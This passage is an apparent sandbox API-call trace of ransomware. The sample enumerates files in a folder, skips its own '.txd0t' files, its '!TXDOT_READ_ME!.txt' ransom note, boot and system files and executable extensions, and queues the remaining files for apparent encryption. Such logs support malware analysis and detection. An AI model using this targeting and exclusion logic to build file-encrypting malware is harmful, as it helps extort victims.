[0087.649] StrCmpW (psz1="RGB9RAST_x64.msi", psz2=".") returned 1 [0087.649] StrCmpW (psz1="RGB9RAST_x64.msi", psz2="..") returned 1 [0087.649] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.649] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.649] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="RGB9RAST_x64.msi", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" [0087.649] PathFindExtensionW (pszPath="RGB9RAST_x64.msi") returned=".msi" [0087.649] StrCmpW (psz1=".msi", psz2=".txd0t") returned -1 [0087.649] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="bootsect.bak") returned 1 [0087.649] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="iconcache.db") returned 1 [0087.649] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="thumbs.db") returned -1 [0087.649] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2=" ransomware ") returned 1 [0087.649] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2=" ransom ") returned 1 [0087.649] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="debug.txt") returned 1 [0087.649] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="boot.ini") returned 1 [0087.649] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="desktop.ini") returned 1 [0087.650] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="autorun.inf") returned 1 [0087.650] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="ntuser.dat") returned 1 [0087.650] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="ntldr") returned 1 [0087.650] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="ntdetect.com") returned 1 [0087.650] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="bootfont.bin") returned 1 [0087.650] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.650] PathFindExtensionW (pszPath="RGB9RAST_x64.msi") returned=".msi" [0087.650] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msi") returned 0x0 [0087.650] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0087.679] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.679] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" [0087.679] SetEvent (hEvent=0x3fc) returned 1 [0087.679] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x177c8300, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x177c8300, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x177c8300, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x17200, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="RGB9Rast_x86.msi", cAlternateFileName="RGB9RA~2.MSI")) returned 1 [0087.679] StrCmpW (psz1="RGB9Rast_x86.msi", psz2=".") returned 1 [0087.679] StrCmpW (psz1="RGB9Rast_x86.msi", psz2="..") returned 1 [0087.679] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.679] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.679] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="RGB9Rast_x86.msi", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" [0087.679] PathFindExtensionW (pszPath="RGB9Rast_x86.msi") returned=".msi" [0087.679] StrCmpW (psz1=".msi", psz2=".txd0t") returned -1 [0087.679] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="bootsect.bak") returned 1 [0087.679] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="iconcache.db") returned 1 [0087.679] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="thumbs.db") returned -1 [0087.679] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2=" ransomware ") returned 1 [0087.680] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2=" ransom ") returned 1 [0087.680] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="debug.txt") returned 1 [0087.680] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="boot.ini") returned 1 [0087.680] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="desktop.ini") returned 1 [0087.680] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="autorun.inf") returned 1 [0087.680] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="ntuser.dat") returned 1 [0087.680] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="ntldr") returned 1 [0087.680] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="ntdetect.com") returned 1 [0087.680] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="bootfont.bin") returned 1 [0087.680] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.680] PathFindExtensionW (pszPath="RGB9Rast_x86.msi") returned=".msi" [0087.680] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msi") returned 0x0 [0087.680] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0087.684] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.684] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" [0087.684] SetEvent (hEvent=0x418) returned 1 [0087.684] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x13148, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Setup.exe", cAlternateFileName="")) returned 1 [0087.684] StrCmpW (psz1="Setup.exe", psz2=".") returned 1 [0087.685] StrCmpW (psz1="Setup.exe", psz2="..") returned 1 [0087.685] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.685] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.685] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Setup.exe", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Setup.exe") returned="C:\\588bce7c90097ed212\\Setup.exe" [0087.685] PathFindExtensionW (pszPath="Setup.exe") returned=".exe" [0087.685] StrCmpW (psz1=".exe", psz2=".txd0t") returned -1 [0087.685] StrCmpIW (psz1="Setup.exe", psz2="bootsect.bak") returned 1 [0087.685] StrCmpIW (psz1="Setup.exe", psz2="iconcache.db") returned 1 [0087.685] StrCmpIW (psz1="Setup.exe", psz2="thumbs.db") returned -1 [0087.685] StrCmpIW (psz1="Setup.exe", psz2=" ransomware ") returned 1 [0087.685] StrCmpIW (psz1="Setup.exe", psz2=" ransom ") returned 1 [0087.685] StrCmpIW (psz1="Setup.exe", psz2="debug.txt") returned 1 [0087.685] StrCmpIW (psz1="Setup.exe", psz2="boot.ini") returned 1 [0087.685] StrCmpIW (psz1="Setup.exe", psz2="desktop.ini") returned 1 [0087.685] StrCmpIW (psz1="Setup.exe", psz2="autorun.inf") returned 1 [0087.685] StrCmpIW (psz1="Setup.exe", psz2="ntuser.dat") returned 1 [0087.685] StrCmpIW (psz1="Setup.exe", psz2="ntldr") returned 1 [0087.685] StrCmpIW (psz1="Setup.exe", psz2="ntdetect.com") returned 1 [0087.685] StrCmpIW (psz1="Setup.exe", psz2="bootfont.bin") returned 1 [0087.685] StrCmpIW (psz1="Setup.exe", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.685] PathFindExtensionW (pszPath="Setup.exe") returned=".exe" [0087.685] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".exe") returned=".exe|.bat|.cmd|.url|.mui" [0087.685] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0xc5158, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupEngine.dll", cAlternateFileName="SETUPE~1.DLL")) returned 1 [0087.686] StrCmpW (psz1="SetupEngine.dll", psz2=".") returned 1 [0087.686] StrCmpW (psz1="SetupEngine.dll", psz2="..") returned 1 [0087.686] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.686] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.686] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SetupEngine.dll", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SetupEngine.dll") returned="C:\\588bce7c90097ed212\\SetupEngine.dll" [0087.686] PathFindExtensionW (pszPath="SetupEngine.dll") returned=".dll" [0087.686] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0087.686] StrCmpIW (psz1="SetupEngine.dll", psz2="bootsect.bak") returned 1 [0087.686] StrCmpIW (psz1="SetupEngine.dll", psz2="iconcache.db") returned 1 [0087.686] StrCmpIW (psz1="SetupEngine.dll", psz2="thumbs.db") returned -1 [0087.686] StrCmpIW (psz1="SetupEngine.dll", psz2=" ransomware ") returned 1 [0087.686] StrCmpIW (psz1="SetupEngine.dll", psz2=" ransom ") returned 1 [0087.686] StrCmpIW (psz1="SetupEngine.dll", psz2="debug.txt") returned 1 [0087.686] StrCmpIW (psz1="SetupEngine.dll", psz2="boot.ini") returned 1 [0087.686] StrCmpIW (psz1="SetupEngine.dll", psz2="desktop.ini") returned 1 [0087.686] StrCmpIW (psz1="SetupEngine.dll", psz2="autorun.inf") returned 1 [0087.686] StrCmpIW (psz1="SetupEngine.dll", psz2="ntuser.dat") returned 1 [0087.686] StrCmpIW (psz1="SetupEngine.dll", psz2="ntldr") returned 1 [0087.686] StrCmpIW (psz1="SetupEngine.dll", psz2="ntdetect.com") returned 1 [0087.686] StrCmpIW (psz1="SetupEngine.dll", psz2="bootfont.bin") returned 1 [0087.686] StrCmpIW (psz1="SetupEngine.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.686] PathFindExtensionW (pszPath="SetupEngine.dll") returned=".dll" [0087.686] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0087.686] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x48150, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupUi.dll", cAlternateFileName="")) returned 1 [0087.686] StrCmpW (psz1="SetupUi.dll", psz2=".") returned 1 [0087.686] StrCmpW (psz1="SetupUi.dll", psz2="..") returned 1 [0087.686] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.686] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.686] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SetupUi.dll", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SetupUi.dll") returned="C:\\588bce7c90097ed212\\SetupUi.dll" [0087.686] PathFindExtensionW (pszPath="SetupUi.dll") returned=".dll" [0087.686] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0087.686] StrCmpIW (psz1="SetupUi.dll", psz2="bootsect.bak") returned 1 [0087.686] StrCmpIW (psz1="SetupUi.dll", psz2="iconcache.db") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.dll", psz2="thumbs.db") returned -1 [0087.687] StrCmpIW (psz1="SetupUi.dll", psz2=" ransomware ") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.dll", psz2=" ransom ") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.dll", psz2="debug.txt") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.dll", psz2="boot.ini") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.dll", psz2="desktop.ini") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.dll", psz2="autorun.inf") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.dll", psz2="ntuser.dat") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.dll", psz2="ntldr") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.dll", psz2="ntdetect.com") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.dll", psz2="bootfont.bin") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.687] PathFindExtensionW (pszPath="SetupUi.dll") returned=".dll" [0087.687] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0087.687] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5381000, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x5381000, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x5381000, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x75a8, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupUi.xsd", cAlternateFileName="")) returned 1 [0087.687] StrCmpW (psz1="SetupUi.xsd", psz2=".") returned 1 [0087.687] StrCmpW (psz1="SetupUi.xsd", psz2="..") returned 1 [0087.687] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.687] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.687] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SetupUi.xsd", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SetupUi.xsd") returned="C:\\588bce7c90097ed212\\SetupUi.xsd" [0087.687] PathFindExtensionW (pszPath="SetupUi.xsd") returned=".xsd" [0087.687] StrCmpW (psz1=".xsd", psz2=".txd0t") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.xsd", psz2="bootsect.bak") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.xsd", psz2="iconcache.db") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.xsd", psz2="thumbs.db") returned -1 [0087.687] StrCmpIW (psz1="SetupUi.xsd", psz2=" ransomware ") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.xsd", psz2=" ransom ") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.xsd", psz2="debug.txt") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.xsd", psz2="boot.ini") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.xsd", psz2="desktop.ini") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.xsd", psz2="autorun.inf") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.xsd", psz2="ntuser.dat") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.xsd", psz2="ntldr") returned 1 [0087.687] StrCmpIW (psz1="SetupUi.xsd", psz2="ntdetect.com") returned 1 [0087.688] StrCmpIW (psz1="SetupUi.xsd", psz2="bootfont.bin") returned 1 [0087.688] StrCmpIW (psz1="SetupUi.xsd", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.688] PathFindExtensionW (pszPath="SetupUi.xsd") returned=".xsd" [0087.688] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xsd") returned 0x0 [0087.688] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0087.719] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.720] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\SetupUi.xsd", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd") returned="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd" [0087.720] SetEvent (hEvent=0x408) returned 1 [0087.720] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6519be00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0x6519be00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0x6519be00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x17758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupUtility.exe", cAlternateFileName="SETUPU~1.EXE")) returned 1 [0087.720] StrCmpW (psz1="SetupUtility.exe", psz2=".") returned 1 [0087.720] StrCmpW (psz1="SetupUtility.exe", psz2="..") returned 1 [0087.720] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.720] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.720] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SetupUtility.exe", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SetupUtility.exe") returned="C:\\588bce7c90097ed212\\SetupUtility.exe" [0087.720] PathFindExtensionW (pszPath="SetupUtility.exe") returned=".exe" [0087.720] StrCmpW (psz1=".exe", psz2=".txd0t") returned -1 [0087.720] StrCmpIW (psz1="SetupUtility.exe", psz2="bootsect.bak") returned 1 [0087.720] StrCmpIW (psz1="SetupUtility.exe", psz2="iconcache.db") returned 1 [0087.720] StrCmpIW (psz1="SetupUtility.exe", psz2="thumbs.db") returned -1 [0087.720] StrCmpIW (psz1="SetupUtility.exe", psz2=" ransomware ") returned 1 [0087.720] StrCmpIW (psz1="SetupUtility.exe", psz2=" ransom ") returned 1 [0087.720] StrCmpIW (psz1="SetupUtility.exe", psz2="debug.txt") returned 1 [0087.720] StrCmpIW (psz1="SetupUtility.exe", psz2="boot.ini") returned 1 [0087.720] StrCmpIW (psz1="SetupUtility.exe", psz2="desktop.ini") returned 1 [0087.720] StrCmpIW (psz1="SetupUtility.exe", psz2="autorun.inf") returned 1 [0087.720] StrCmpIW (psz1="SetupUtility.exe", psz2="ntuser.dat") returned 1 [0087.720] StrCmpIW (psz1="SetupUtility.exe", psz2="ntldr") returned 1 [0087.720] StrCmpIW (psz1="SetupUtility.exe", psz2="ntdetect.com") returned 1 [0087.720] StrCmpIW (psz1="SetupUtility.exe", psz2="bootfont.bin") returned 1 [0087.720] StrCmpIW (psz1="SetupUtility.exe", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.720] PathFindExtensionW (pszPath="SetupUtility.exe") returned=".exe" [0087.720] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".exe") returned=".exe|.bat|.cmd|.url|.mui" [0087.721] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0xa078, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SplashScreen.bmp", cAlternateFileName="SPLASH~1.BMP")) returned 1 [0087.721] StrCmpW (psz1="SplashScreen.bmp", psz2=".") returned 1 [0087.721] StrCmpW (psz1="SplashScreen.bmp", psz2="..") returned 1 [0087.721] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.721] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0087.721] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SplashScreen.bmp", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned="C:\\588bce7c90097ed212\\SplashScreen.bmp" [0087.721] PathFindExtensionW (pszPath="SplashScreen.bmp") returned=".bmp" [0087.721] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0087.721] StrCmpIW (psz1="SplashScreen.bmp", psz2="bootsect.bak") returned 1 [0087.721] StrCmpIW (psz1="SplashScreen.bmp", psz2="iconcache.db") returned 1 [0087.721] StrCmpIW (psz1="SplashScreen.bmp", psz2="thumbs.db") returned -1 [0087.721] StrCmpIW (psz1="SplashScreen.bmp", psz2=" ransomware ") returned 1 [0087.721] StrCmpIW (psz1="SplashScreen.bmp", psz2=" ransom ") returned 1 [0087.721] StrCmpIW (psz1="SplashScreen.bmp", psz2="debug.txt") returned 1 [0087.721] StrCmpIW (psz1="SplashScreen.bmp", psz2="boot.ini") returned 1 [0087.721] StrCmpIW (psz1="SplashScreen.bmp", psz2="desktop.ini") returned 1 [0087.721] StrCmpIW (psz1="SplashScreen.bmp", psz2="autorun.inf") returned 1 [0087.721] StrCmpIW (psz1="SplashScreen.bmp", psz2="ntuser.dat") returned 1 [0087.721] StrCmpIW (psz1="SplashScreen.bmp", psz2="ntldr") returned 1 [0087.721] StrCmpIW (psz1="SplashScreen.bmp", psz2="ntdetect.com") returned 1 [0087.721] StrCmpIW (psz1="SplashScreen.bmp", psz2="bootfont.bin") returned 1 [0087.721] StrCmpIW (psz1="SplashScreen.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.721] PathFindExtensionW (pszPath="SplashScreen.bmp") returned=".bmp" [0087.721] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0087.721] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0087.725] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.725] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\SplashScreen.bmp", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp") returned="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp" [0087.725] SetEvent (hEvent=0x418) returned 1 [0087.725] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x143bc400, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0x143bc400, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x143bc400, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x23420, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0087.725] StrCmpW (psz1="sqmapi.dll", psz2=".") returned 1 [0087.725] StrCmpW (psz1="sqmapi.dll", psz2="..") returned 1 [0087.725] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0087.725] StrNCatW (in: 